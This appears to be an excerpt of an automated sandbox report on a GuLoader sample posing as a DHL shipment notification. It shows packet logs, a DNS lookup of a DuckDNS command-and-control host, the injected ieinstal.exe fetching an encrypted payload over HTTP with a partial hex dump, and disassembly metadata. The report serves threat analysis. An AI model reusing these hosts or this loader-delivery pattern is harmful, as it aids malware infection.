Sep 27, 2021 12:54:11.375761032 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375781059 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375865936 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375924110 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375952005 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375972033 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376034975 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.376050949 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376120090 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.376130104 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376199961 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.376238108 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376281977 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.376292944 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376342058 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.376374006 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376390934 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.376437902 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.376446962 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376508951 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.376543999 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376607895 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.376697063 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.393996000 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.394205093 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.394321918 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.394380093 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.394448996 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.394525051 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.394586086 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.394604921 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.394675970 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.394725084 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.394731045 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.394773006 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.394979954 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.402370930 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.402595997 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.402683973 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.402750015 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.402750969 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.402797937 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.402848005 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.402894974 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.402940989 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.402987003 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403033018 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403079033 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403100014 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403135061 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403212070 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403240919 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403291941 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403321028 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403374910 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403392076 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403460026 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403526068 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403546095 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403609037 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403629065 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403685093 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403732061 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403752089 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403778076 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403825045 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403871059 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403897047 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403918982 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.403935909 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.403954983 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.404052973 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.404092073 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.404175043 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:15.672219992 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:54:15.733942032 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:54:15.734190941 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:54:15.734563112 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:54:15.835287094 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:54:15.867204905 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:54:15.870044947 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:54:15.975159883 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:54:16.802190065 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:16.802454948 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:55:10.188525915 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:55:10.190002918 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:55:10.306442976 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:56:01.144946098 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:56:01.457412004 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:56:02.066647053 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:56:03.269531012 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:56:05.675313950 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:56:10.486638069 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:56:10.537024975 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:56:10.538548946 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:56:10.641530037 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:56:20.093795061 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:57:10.909358025 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:57:10.911664009 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:57:11.007210016 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:58:11.222590923 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:58:11.224039078 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:58:11.315082073 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:59:11.541935921 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 12:59:11.543469906 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 12:59:11.635679960 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 13:00:11.864240885 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 13:00:11.865643978 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 13:00:11.970252037 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 13:01:12.182972908 CEST	6577	49807	193.104.197.28	192.168.11.20
Sep 27, 2021 13:01:12.184376955 CEST	49807	6577	192.168.11.20	193.104.197.28
Sep 27, 2021 13:01:12.282124996 CEST	6577	49807	193.104.197.28	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 12:53:18.719424009 CEST	58185	53	192.168.11.20	1.1.1.1
Sep 27, 2021 12:53:18.728887081 CEST	53	58185	1.1.1.1	192.168.11.20
Sep 27, 2021 12:53:18.894464016 CEST	62287	53	192.168.11.20	1.1.1.1
Sep 27, 2021 12:53:18.903879881 CEST	53	62287	1.1.1.1	192.168.11.20
Sep 27, 2021 12:54:07.946261883 CEST	62957	53	192.168.11.20	1.1.1.1
Sep 27, 2021 12:54:07.954547882 CEST	53	62957	1.1.1.1	192.168.11.20
Sep 27, 2021 12:54:09.241504908 CEST	49676	53	192.168.11.20	1.1.1.1
Sep 27, 2021 12:54:09.249978065 CEST	53	49676	1.1.1.1	192.168.11.20
Sep 27, 2021 12:54:15.565355062 CEST	54150	53	192.168.11.20	1.1.1.1
Sep 27, 2021 12:54:15.667402029 CEST	53	54150	1.1.1.1	192.168.11.20
Sep 27, 2021 12:54:19.062755108 CEST	62465	53	192.168.11.20	1.1.1.1
Sep 27, 2021 12:54:19.071634054 CEST	53	62465	1.1.1.1	192.168.11.20
Sep 27, 2021 12:54:42.318491936 CEST	64086	53	192.168.11.20	1.1.1.1
Sep 27, 2021 12:54:42.328056097 CEST	53	64086	1.1.1.1	192.168.11.20
Sep 27, 2021 12:54:42.489351034 CEST	59044	53	192.168.11.20	1.1.1.1
Sep 27, 2021 12:54:42.498477936 CEST	53	59044	1.1.1.1	192.168.11.20
Sep 27, 2021 13:00:19.081100941 CEST	65106	53	192.168.11.20	1.1.1.1
Sep 27, 2021 13:00:19.089767933 CEST	53	65106	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 12:54:15.565355062 CEST	192.168.11.20	1.1.1.1	0x387d	Standard query (0)	septnet.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 27, 2021 12:54:15.667402029 CEST	1.1.1.1	192.168.11.20	0x387d	No error (0)	septnet.duckdns.org		193.104.197.28	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

178.32.63.50

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49806	178.32.63.50	80	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 12:54:11.229765892 CEST	127	OUT	GET /moss/Host_AKhLBP62.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 178.32.63.50 Cache-Control: no-cache
Sep 27, 2021 12:54:11.300846100 CEST	128	IN	HTTP/1.1 200 OK Date: Mon, 27 Sep 2021 10:54:11 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Sun, 26 Sep 2021 18:13:42 GMT ETag: "28240-5cce9f0c40c70" Accept-Ranges: bytes Content-Length: 164416 Content-Type: application/octet-stream Data Raw: 4d 4b d6 90 54 86 89 f0 36 1f 32 7c 2f 5d 6b 2e cb 8b 6b 55 82 7c 3d 3b a7 2e d8 a7 47 4a 66 5d 4f 27 77 ef 07 33 dd 7d 63 4d fb 54 76 98 8e 5d 1a 2d b8 51 91 f7 a8 a0 dd b8 38 01 88 e3 5a 14 c3 12 34 c4 32 f4 fc 10 65 b3 22 bc c7 24 49 65 ab 12 a6 e7 7e 99 9f 75 1d 58 f8 48 77 7a f4 e0 8e a4 ee f6 6b 1d 3f 71 34 2c 09 f4 d2 b3 5a 25 80 52 98 7c ce 1b 6c cd e2 71 17 bb c8 bc b6 e4 8d 25 17 4b 60 93 2a 20 59 fa 80 0b 2b bb 01 81 4a 7c 4f db c1 3a 77 a7 10 f9 c2 35 2f 03 4d dc 7e 5d fe f6 13 04 d7 0a bf e2 31 f0 f8 d4 05 34 0d 10 2d c7 8c b7 ad b7 55 21 c5 4c e7 d1 04 c4 c9 13 8a c5 b0 89 a8 93 29 59 2c a4 1f f7 fe 61 1c 81 bc 35 75 7d 68 55 87 48 c4 5a cd 6e 41 73 6b d6 78 63 27 4d c4 ee 64 83 93 cd b3 6f 41 93 76 5f 8f d9 97 5a 5b da ac 03 92 b0 43 3b 49 d9 2b d1 d9 55 ab b4 3b 54 c9 d3 10 2d 3a 80 9e e2 41 b7 02 14 11 7b 38 bf 3e 64 c4 22 fd d9 c4 8f 79 95 4f 2d 77 1a 88 51 86 89 f8 77 bb b2 55 49 a4 31 a6 58 a5 d9 3c f1 bd 1b 44 a6 6c 29 df 59 c0 6e de 68 f0 eb 86 a1 15 7c 81 70 5a 2c 02 5e c6 75 0a b3 7a 64 15 df 68 0d 55 cc c6 23 e6 56 ef 0b a3 89 12 69 a8 15 6b 74 07 8f ed 70 43 29 23 6b 18 83 29 47 c5 be 43 c6 c3 78 ee 89 87 44 bb 1c 15 44 61 8d 39 5e 7d 7d bd 93 40 82 79 a8 d4 0b b6 eb e1 cb 9d b2 e3 6f a9 3b be e8 72 da 3c 38 0a fc 21 8f 62 c6 f4 ba 37 8f e4 21 a9 77 02 f8 a5 69 fb a8 fa 6b 38 2e ae c8 b5 5b ad 13 a9 bf 34 d2 32 9b cc 7c 59 ea c3 49 cc ef 58 e8 2d 00 48 dd 9b c6 b0 b0 46 90 24 72 f9 48 ec e3 c9 a6 05 1a 94 7f 25 30 cd 61 d8 48 af 03 11 d0 c2 6b c7 3f 49 6c 80 17 f1 10 47 33 5c 32 62 4c ba 16 da 13 d6 f8 5a d1 29 7f 0a 6b 62 3e 86 3e 1f 33 44 98 b7 85 f0 e6 4a 67 e3 32 d1 a7 2e a1 84 0e 44 a8 c5 ed fc ad 24 28 b8 3b 60 eb e5 5c 39 4c 8c ed 4e 0d 9e ce 58 90 18 27 f1 2f 37 a3 bc b2 10 80 71 0e 38 43 99 48 47 02 a5 20 62 0a 90 7c b3 a1 25 59 18 32 70 3e 4a 93 6f fc f7 5c 61 18 ac 16 18 d8 ed 1e 44 40 a8 e2 86 11 9b 5a ca ae 1d e2 fc 3c b7 c9 ba 7c ad 9f ed 99 cb c7 69 ce 19 75 97 af 4b 8c 14 ef 98 13 f7 2c cb 92 c4 60 5a c8 10 64 2c 7c ab fd 2c ce bb 78 59 eb 2f 45 a9 0e d4 ab b8 fb fe 39 45 50 c0 45 19 36 dc c4 fe e9 5f 2d 8e 91 a1 60 a6 63 b8 fb ba cf 25 33 40 0a 18 a7 c6 71 51 0c 87 c5 a4 78 69 9d 86 28 c7 d2 5d c0 38 41 56 5c ea 96 5d 27 b1 0c 6f 34 de 26 b5 db 6c 3f 3f a8 12 7d 56 a2 34 7f a5 f7 81 38 99 7b 7b 34 b7 44 63 15 f6 4b e2 db 86 73 1f 80 c2 a7 5c 12 0e a3 e7 93 06 24 8b 24 e3 f6 fa 62 16 3f 16 20 f5 7c 61 5a 9d 0e d5 b3 ed 86 8c 0e cd f8 b8 34 34 a4 ef a0 0a 05 0b bc 71 c3 06 23 a0 be 26 e1 6a fe 45 ad 3c d4 46 d8 31 4a 7a 96 a7 e7 8d aa 81 9b c2 40 09 a4 30 7e 6f 05 cd 04 01 ff a2 12 dd 34 98 5c 3d b0 44 4d 08 76 2c b5 4d 65 ad 01 c8 aa 13 87 24 b9 97 dd 6e f1 c7 9a 4f 07 9a 81 51 78 c0 0c 98 91 fb 2f a2 ed 7c 8c 9e f7 03 9e 57 0c 7d 67 bf f8 45 3f e8 36 4e a7 53 8e 48 a4 c4 31 f4 fc 10 61 b3 22 bc 38 db 49 65 13 12 a6 e7 7e 99 9f 75 5d 58 f8 48 77 7a f4 e0 8e a4 ee f6 6b 1d 3f 71 34 2c 09 f4 d2 b3 5a 25 80 52 98 7c ce 1b 6c cd e2 71 17 bb 48 bc b6 e4 83 3a ad 45 60 27 23 ed 78 42 81 47 e6 9a 55 e9 23 0f 6f ab b3 55 10 d5 71 94 e2 56 4e 6d 23 b3 0a 7d 9c 93 33 76 a2 64 9f 8b 5f d0 bc 9b 56 14 60 7f 49 a2 a2 ba a0 bd 71 21 c5 4c e7 d1 04 c4 99 56 8a c5 fc 88 af 93 6f 20 e6 fa 1f f7 fe 61 1c 81 bc Data Ascii: MKT62\|/]k.kU\|=;.GJf]O'w3}cMTv]-Q8Z42e"$Ie~uXHwzk?q4,Z%R\|lq%K`* Y+J\|O:w5/M~]14-U!L)Y,a5u}hUHZnAskxc'MdoAv_Z[C;I+U;T-:A{8>d"yO-wQwUI1X<Dl)Ynh\|pZ,^uzdhU#ViktpC)#k)GCxDDa9^}}@yo;r<8!b7!wik8.[42\|YIX-HF$rH%0aHk?IlG3\2bLZ)kb>>3DJg2.D$(;`\9LNX'/7q8CHG b\|%Y2p>Jo\aD@Z<\|iuK,`Zd,\|,xY/E9EPE6_-`c%3@qQxi(]8AV\]'o4&l??}V48{{4DcKs\$$b? \|aZ44q#&jE<F1Jz@0~o4\=DMv,Me$nOQx/\|W}gE?6NSH1a"8Ie~u]XHwzk?q4,Z%R\|lqH:E`'#xBGU#oUqVNm#}3vd_V`Iq!LVo a
Sep 27, 2021 12:54:11.300967932 CEST	129	IN	Data Raw: 35 95 7d 66 56 8c 49 c6 43 cd 68 43 73 6b ae 78 63 27 25 c4 ee 49 a7 93 9b e0 4e 9a 10 9a 6b 4a dc d3 72 59 da 53 ec 6d 4f 84 3d 6d 79 cb 93 d9 bd c5 98 3b 54 0a d7 34 8d d8 c2 9e 0a 22 ab 01 14 9a 4a e8 0a 71 da 01 27 cf 6a 86 8e 79 95 6f 2d b0 Data Ascii: 5}fVIChCskxc'%INkJrYSmO=my;T4"Jq'jyo-XwLX<4bX&wVz~~{h}%\|dFYO)GNg2x`CDrGicTyOu;H:jrS@u}nO?HZTZ#n[=
Sep 27, 2021 12:54:11.301052094 CEST	131	IN	Data Raw: a1 6e a6 46 4b 2b 7e 4b 01 be 40 0a 18 d4 00 f5 75 82 87 c5 e4 24 9f 5b a2 a7 c7 d2 5d e5 fe c5 72 cc ea 96 5d 54 77 88 4b a5 de 26 b5 db ab 3b 1b 52 3b 3f 56 dc 76 97 63 16 80 38 14 ef 5f f8 b5 44 63 9c b2 6f ee 56 02 57 d3 80 c2 a7 9b 56 2a a7 Data Ascii: nFK+~K@u$[]r]TwK&;R;?Vvc8_DcoVWV*$ps&27eZP0WD+N)XF1wFD0~Az4I,Le z$~~OY}V\|~HYkWQ>HM5Lq"9}~
Sep 27, 2021 12:54:11.301104069 CEST	132	IN	Data Raw: ea bb 85 54 50 28 02 5e 2e de d6 b2 7a e1 d5 56 ae 02 d1 a0 cf 23 e6 d6 94 2a a1 86 2a e4 a0 11 6b 74 84 4c ef b7 07 0d 33 6f 1a 83 29 ce 81 9a 4f 01 87 5c e6 88 87 44 bb db 51 60 65 8a 39 5e 7d f4 a1 b7 a8 d4 76 a9 d4 86 30 ef e3 cb 9d 75 3b 48 Data Ascii: TP(^.zV#*ktL3o)O\DQ`e9^}v0u;H?hrx!b3!,-G[vGRx}iFVJjn@%H#>If4KfKb@hW6D!E0,f@$8P.SNG
Sep 27, 2021 12:54:11.318528891 CEST	133	IN	Data Raw: 8c 0f 98 99 80 21 22 a0 57 1a e5 6a fe cc b1 18 3c 16 f0 30 4a 93 b9 a3 e7 8d 6d 85 bf de 46 09 a4 d8 26 b8 04 cd 81 c1 76 64 1d 59 2d 9c 5c 3d 77 00 69 18 72 2e b5 4d ec e9 25 c4 27 af a3 f4 bd 97 dd a9 b5 e3 92 4e 07 9a 81 96 3c e4 08 9f 91 fb Data Ascii: !"Wj<0JmF&vdY-\=wir.M%'N</+Xdye{&JS9atf<IeyIwkCU8MZ%Xl+Md'#*<fCU`+Q\|I3}ORWV$[M4m-2Mrb$0
Sep 27, 2021 12:54:11.318638086 CEST	135	IN	Data Raw: 1f a1 33 d1 b5 80 be 16 ab 47 00 7d f0 48 75 e8 62 34 cc 29 e8 6f 22 64 39 34 70 33 89 e3 76 fd 58 9b 83 e7 2a 9f 37 f5 7f ac 2c 95 c5 40 7c af 23 fa b5 3d da 38 b2 0d 42 a3 5e 78 7c 63 37 d5 7e 46 40 33 2a fe 9a d2 dc 32 98 4b 3e 7a dc 55 a7 18 Data Ascii: 3G}Hub4)o"d94p3vX7,@\|#=8B^x\|c7~F@32K>zU2`828^{X-$=6 .R)V5'\|Gu*(dH bX^b@Z(fO\|O.I0Ou7qXCe+ElK <G7
Sep 27, 2021 12:54:11.318690062 CEST	136	IN	Data Raw: 56 0d 41 4b 9b e2 c3 6a 12 dc 79 d0 c4 dc 94 76 7a f4 69 e2 80 e2 31 2f 39 37 76 18 6e 09 33 96 97 5e 21 82 52 98 f5 d2 3f e5 89 c6 61 ff d7 b5 bc b6 61 43 44 b9 cc 24 03 2b 60 3c 66 cd ce ba be 51 60 27 2b 87 af 49 55 10 93 fa d0 c6 12 75 5d 2c Data Ascii: VAKjyvzi1/97vn3^!R?aaCD$+`<fQ`'+IUu],16cl S]d[G>Lj H`io o;u%8{qyVIO`k\o'%A;rZ'G9IP+1;i-[lg}#1q5?O
Sep 27, 2021 12:54:11.318840027 CEST	138	IN	Data Raw: 3e 73 5e 02 28 03 55 1e 17 91 fd 22 35 65 fe b2 1f 36 99 01 8e 6f 34 48 81 40 a5 13 5e a7 90 c2 f1 a1 96 65 f5 f2 9c 19 2e 7b 61 99 7c 17 58 91 63 19 ae c1 2e f1 5c 4d 1e ce 2b 4f 5f 18 ca a1 ab de 41 3c 71 8b ba f7 91 22 ad 4b b9 87 74 9b d0 14 Data Ascii: >s^(U"5e6o4H@^e.{a\|Xc.\M+O_A<q"KtYK1=u,{>&uF/%;n 2wW(QNW\|aq^hz8rj,'8)0VdvAi7/W4qc&es,OPu}r{2,\|6\D
Sep 27, 2021 12:54:11.318901062 CEST	139	IN	Data Raw: af c5 fc 88 50 9c d9 fb d7 32 2c b0 f2 ea 08 1c bc f3 d7 7d ed 0a a8 4d 47 a1 cd 68 bc 73 64 18 a7 52 f7 ae d0 73 49 61 d1 cd 32 9d 41 6c 76 7f bc 09 1e 98 93 9c a3 d2 78 a8 cb 6f 45 50 ed 10 33 45 22 e2 36 dd 0f 12 fa 25 b2 d6 90 61 85 9f 5a 4a Data Ascii: P2,}MGhsdRsIa2AlvxoEP3E"6%aZJN"dO]QS>+Am)VXmRXxskwPrUU,Pk]n,Sd.v]LR^}}4]O41*Cp0[}lL2)B;kw9Cqr
Sep 27, 2021 12:54:11.318952084 CEST	140	IN	Data Raw: c4 d0 4b 20 49 76 17 c2 07 a2 f8 3e d8 a9 80 c5 95 28 bb 2f b4 3b 78 db 4c c4 34 93 f7 90 66 15 8e dc 44 82 f4 19 f1 8e 5c 67 2f 14 2d d0 88 3e 70 ab d5 3d 15 bc 20 62 f3 e2 7c d9 17 48 52 bb bc de af c1 82 de 63 74 4e 58 74 64 39 4a 9e 72 da 34 Data Ascii: K Iv>(/;xL4fD\g/->p= b\|HRctNXtd9Jr4k`N0^+{'$wb?TskL'z!Z'<Gt2~o x@!+g58e@b}\H/t_(qO9'rjlM
Sep 27, 2021 12:54:11.319000006 CEST	142	IN	Data Raw: fd 3e af 62 8e 59 a0 dd b2 14 eb 06 1c 5a 75 fa 85 1c 4d 41 c9 59 2c 02 5e 7b 76 0a b3 7a 97 bf 52 2c 29 5c 45 1f 0a 3b db b3 0f ac 00 79 ed 72 3c 80 87 a3 67 bc 8e bc d6 6e e8 e5 7c 5d 40 03 fa 68 c2 fe 93 1d 02 c3 60 b7 97 59 60 49 04 38 dd b9 Data Ascii: >bYZuMAY,^{vzR,)\E;yr<gn\|]@h`Y`I8m#/RN)h~&y`F{lr9EQ<-<,A5e(psC&<gt1S K!]33\2g{s$q%oF.x}JO2Y.?D%

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe PID: 872 Parent PID: 7844

General

Start time:	12:53:20
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
Imagebase:	0x400000
File size:	98304 bytes
MD5 hash:	8E2B177D2AB29C95F067559A029CF5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: ieinstal.exe PID: 7104 Parent PID: 872

General

Start time:	12:53:43
Start date:	27/09/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
Imagebase:	0xad0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe PID: 872 Parent PID: 7844 DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCOMMON

Executed Functions

Function 00403DD6, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 263memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00014000,59E82F3C,-00000001E961C348), ref: 004040E0

Strings

#, xrefs: 00403F11
</Y, xrefs: 00404074
4, xrefs: 00403F6D
t, xrefs: 00403FA6
C, xrefs: 00403F04

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: #$4$</Y$C$t
API String ID: 4275171209-4177666475
Opcode ID: b957a90be555ff310691938cbbb8b888b6f535d539cd36b71514d004f3fbed23
Instruction ID: d8f2e64fffe10ff016cfeae2d0abe72d9a08336ff8e66d231467780935cbf419
Opcode Fuzzy Hash: b957a90be555ff310691938cbbb8b888b6f535d539cd36b71514d004f3fbed23
Instruction Fuzzy Hash: E84110916A634649FF740034C6E073E2547DB9B300F70AE3BD942EAECADA2EC5C11217

Uniqueness

Uniqueness Score: -1.00%

Function 0230CED6, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 570COMMON

Download Yara Rule

Strings

,J, xrefs: 0230D638
T\4, xrefs: 0230D8A5

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: ,J$T\4
API String ID: 3389902171-1611949997
Opcode ID: fda27220e4442791e33b495d7bf0878072fb83eb6bb6dcf92a5534000e724e40
Instruction ID: b512d8d7533809946d28b60add67b84cc7ba48984da9b026969cd612e35b5cda
Opcode Fuzzy Hash: fda27220e4442791e33b495d7bf0878072fb83eb6bb6dcf92a5534000e724e40
Instruction Fuzzy Hash: 5632D4715083898FDB35DF74C8E87DABBE1AF52310F44819AC89A8F2D6D7748541CB22

